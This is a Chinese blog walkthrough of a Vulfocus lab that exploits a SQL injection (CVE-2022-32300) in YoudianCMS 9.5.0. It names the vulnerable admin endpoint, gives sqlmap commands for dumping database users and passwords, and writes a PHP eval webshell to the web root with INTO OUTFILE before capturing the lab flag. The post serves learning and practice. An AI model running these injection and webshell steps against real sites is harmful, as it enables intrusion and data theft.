Vulfocus靶场-youdiancms 9.5.0 版本 SQL注入 (CVE-2022-32300)

最新推荐文章于 2025-12-12 17:07:47 发布
原创 最新推荐文章于 2025-12-12 17:07:47 发布 · 193 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #数据库 #SQL注入 #SQLMAP #网络安全 #web安全

简介

youdiancms 9.5.0 版本 SQL注入 (CVE-2022-32300)

启动靶场

访问启动的连接,得到靶场:
在这里插入图片描述
直接安装,按照这个来填写参数:
数据库:root/root 数据库名:youdian
在这里插入图片描述安装成功就可以使用系统了:
在这里插入图片描述
访问后台,输入刚刚配置的用户名和密码,就可以进入后台:
在这里插入图片描述

开始渗透

根据提示:
通过 /App/Lib/Action/Admin/MailAction.class.php 中的 MailSendID 参数发现 YoudianCMS v9.5.0 包含 SQL 注入漏洞。
这个地方需要去下载源码进行审计,发现访问路径:
/index.php/Admin/mail/viewLog?MailSendID=*

先对这个路径进行抓包

在这里插入图片描述
因为这个地方需要登录,所以把请求包复制到一个文本中req.txt:
在这里插入图片描述

然后再利用sqlmap进行测试

在这里插入图片描述
在这里插入图片描述
已经探测到存在SQL注入!

找到网站的绝对路径

通过目录扫描得到根目录有install.php
在这里插入图片描述
发现网站根路径是/var/www/wordpress。

直接写入webshell

SELECT '<?php eval($_REQUEST[6]);?> ' INTO OUTFILE '/var/www/wordpress/1.php';

通过SQLmap拿到 --sql-shell

python sqlmap.py -r req.txt --sql-shell

在这里插入图片描述
执行
在这里插入图片描述

爆数据库的用户名和密码

由于前面直接写码无法写入,只能通过数据库再去尝试写码
先读取用户名

python sqlmap.py -r req.txt --users

在这里插入图片描述
读取密码:

python sqlmap.py -r req.txt --passwords

在这里插入图片描述
再连接mysql :
在这里插入图片描述
写码:
在这里插入图片描述
在这里插入图片描述

连接蚁🗡:

在这里插入图片描述
拿到flag:
flag-{bmhc865116e-a96a-43a2-9bbc-1aa03a88321b}

友点CMS GetSpecial SQL注入漏洞复现
0xSec
02-20 791
​友点CMS建站系统GetSpecial接口处存在SQL注入漏洞,未经身份认证的攻击者可以利用该漏洞获取系统数据库敏感信息,深入利用可获取服务器权限。
youdiancms 9.5.0 版本 SQL注入vulfocus复现)
qq_40646572的博客
04-24 2207
从上述信息,可以看到,web服务的80端口被映射到62461端口,并且该服务对外开启了3306端口并映射到20130 端口。并且给了数据库的相关信息。
漏洞复现|youdiancms 9.5.0 版本 SQL注入CVE-2022-32300
weixin_50791426的博客
11-26 3931
友点企业网站管理系统(简称YouDianCMS系统)集PC站、手机站、微网站、多端小程序(微信、百度、抖音/头条、支付宝、QQ、360小程序)、APP于一体,共用空间,数据同步,是国内开源十站合一优秀企业建站解决方案。通过 /App/Lib/Action/Admin/MailAction.class.php 中的 MailSendID 参数发现 YoudianCMS v9.5.0 包含 SQL 注入漏洞。易受攻击的URL为:/index.php/Admin/mail/viewLog?
YouDianCMS v9.5.0 开源十合一建站系统
02-04
YouDianCMS即友点企业网站管理系统集PC站+手机站+微网站+多端小程序(微信、百度、抖音/头条、支付宝、QQ、360小程序)+APP十站合一,数据自动同步,降低人力维护成本;共用一个管理后台,只要一个服务器,有效节约空间投资。系统采用开源技术PHP+MYSQL开发,开源且具有操作简单、功能强大、稳定性好、易扩展、安全性强、维护方便、兼容性好等特点,可帮您快速构建一个强大专业的企业网站。系统支持多语言轻松打造国际站、自定义模型、支持网站模板换肤、内置SEO优化功能、静态页、评论留言、购物车、在线支付、优惠券、积分、三级分销、订单管理、会员、数据采集、短信接口、插件应用商店、广告等企业网站基本功能。运行环境:PHP5.3/5.4/5.5/5.6/7.0/7.1/7.2/7.3/8.0 + MYSQL。 运行环境: 操作系统:跨平台,支持Windows、Unix、Linux等操作系统 WEB服务器:IIS/APACHE/NGINX等 PHP环境:PHP5.3-8.0 数据库:MYSQL5.0-8.0
youdiancms 9.5.0 版本 SQL注入CVE-2022-32300
qq_23003811的博客
07-18 835
友点企业网站管理系统(简称YouDianCMS系统)集PC站、手机站、微网站、多端小程序(微信、百度、抖音/头条、支付宝、QQ、360小程序)、APP于一体,共用空间,数据同步,是国内开源十站合一优秀企业建站解决方案。通过 /App/Lib/Action/Admin/MailAction.class.php 中的 MailSendID 参数发现 YoudianCMS v9.5.0 包含 SQL 注入漏洞。数据库:root/root 数据库名:youdian。3、接下来就是爆表名、爆字段和数据找flag了。
vulfocus youdiancms 9.5.0 版本 SQL注入CVE-2022-32300
weixin_61913198的博客
10-19 1703
描述: 友点企业网站管理系统(简称YouDianCMS系统)集PC站、手机站、微网站、多端小程序(微信、百度、抖音/头条、支付宝、QQ、360小程序)、APP于一体,共用空间,数据同步,是国内开源十站合一优秀企业建站解决方案。使用sqlmap一把梭,注意,这里需要使用抓包方式注入,因为是后台sql注入,会校验cookie,直接复制xray数据包,删除payload进行注入。登陆后台使用被动扫描访问该地址,Xray成功扫描出该地址存在sql注入漏洞。然后使用cmd5解密。写入成功后,蚁剑连接。
精选资源
YouDianCMS
04-06
4.[优化]全面升级后台编辑器ckeditor至最新4.8版本,支持多图插入和上传、设置行高、从word文档可以直接粘贴图片并自动上传到服务器、高版本ie打开编辑器不再有兼容问题 5.[增加]产品规格属性增加图片,增强用户体验...
gcc-9.5.0.tar.gz
06-23
GCC(GNU Compiler Collection,GNU编译器套件)是由GNU开发的编程语言编译器。GNU编译器套件包括C、C++、 Objective-C、 Fortran、Java、Ada和Go语言前端,也包括了这些语言的库(如libstdc++,libgcj等。...
chilkat2-9.5.0-python-3.5-x86_64-linux.tar.gz
03-19
chilkat2-9.5.0-python-3.5-x86_64-linux.tar.gz CkPython API是最初的Chilkat for Python API,它使用称为SWIG(swig.org)的东西围绕C / C ++实现生成Python包装器。结果是CkPython API的样式具有更多的C / C ++...
chilkat-9.5.0-python-3.6-x64.zip
03-19
chilkat-9.5.0-python-3.6-x64.zip python3.6 windows-X64
apm-spring-cloud-gateway-4.x-plugin-9.5.0.jar
10-19
apm-spring-cloud-gateway-4.x-plugin-9.5.0
无胁科技-TVD每日漏洞情报-2022-7-1
wuthreat无胁科技的博客
07-01 538
漏洞名称:GitHub 存储库 getgrav/grav 代码注入漏洞 漏洞级别:严重 漏洞编号:CVE-2022-2073;CNNVD-202206-2812 相关涉及:Grav v1.7.32 - Admin v1.10.32 漏洞状态:POC 参考链接:https://tvd.wuthreat.com/#/listDetail?TVD_ID=TVD-2022-13367漏洞名称:Zoho ManageEngine ADAudit Plus 远程代码执行漏洞 漏洞级别:严重 漏洞编号:CVE-2022-
友点CMS V9.1 前台SQL注入
Nginxx的博客
11-18 3614
漏洞描述 友点 CMS V9.1 前台存在 sql 注入,攻击者可获取数据库内容 漏洞影响 youdiancms <=9.1 漏洞复现 GET /index.php/Channel/voteAdd HTTP/1.1 Host: www.youdiancms90.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0 Accept: text/html,applicati
注入漏洞-sql注入
热门推荐
一个很酷的人
04-30 4万+
注入漏洞 注入漏洞 1 SQL注入 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行指定的SQL语句。具体来说,它是利用现有应用程序,将SQL语句注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入SQL语句得到一个存在安全漏洞的网站上的数据,而不是按照设计者意图去执行SQL语句。 1.1 SQL注入...
youdiancms(友点cms)漏洞
weixin_50464560的博客
08-28 4172
前言 在近期的授权项目中,遇到了一个目标,使用了youdiancms,需要获取权限,进而进行审计,本次代码审计过程先发现SQL注入漏洞,继续审计发现getshell的漏洞,本文将本次审计过程书写下来,仅作为学习研究,请勿用作非法用途。 0x01 未授权SQL注入首先拿到源码一看,发现该系统是基于THINKPHP3开发的。 在App/Lib/Action/HomeBaseAction.class.php:16 cookie可控,然后赋值给了$this->_fromUser 跟踪一下$this->
youdiancms 8.0 sql注入漏洞
qq_36093477的博客
08-01 5802
Youdiancms sql injection vulnerability Youdiancms sql injection vulnerability First download youdiancms 8.0 to build a local test environment http://www.youdiancms.com/ Successfully set up a local t...
MySQLSQL 注入
csbysj2020
12-11 430
MySQL 是一款开源的关系型数据库管理系统,由瑞典 MySQL AB 公司开发。它遵循 GNU 通用公共许可证(GPL),可以在商业和非商业环境下使用。MySQL 支持多种编程语言,如 C、C++、Java、PHP、Python 等,并且拥有丰富的扩展功能和优秀的性能。SQL 注入是一种常见的网络安全漏洞,它允许攻击者通过在 SQL 语句中插入恶意代码,从而获取数据库的控制权限。攻击者可以利用 SQL 注入攻击,窃取敏感数据、修改数据、删除数据、执行任意命令等。
SQL篇——【MySQL篇:SQL理论】SQL 与关系型数据库核心要点详解
最新发布
2403_88453964的博客
12-12 894
本文系统介绍了关系型数据库的核心概念与SQL操作指南。主要内容包括:1.关系型数据库基础概念,包括主流数据库产品对比;2.SQL语言详解,涵盖DDL(数据定义)、DML(数据操作)、DQL(数据查询)和DCL(数据控制)四大类语法;3.数据库函数与约束机制,包括字符串、数值、日期函数及主键、外键等约束类型;4.多表查询技术,涉及内连接、外连接、子查询等复杂查询方法;5.事务管理,详细说明ACID特性、隔离级别及并发控制。全文采用示例驱动的讲解方式,提供大量实用SQL代码片段,适合作为关系型数据库学习的系统参
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Miracle_PHP|JAVA|安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值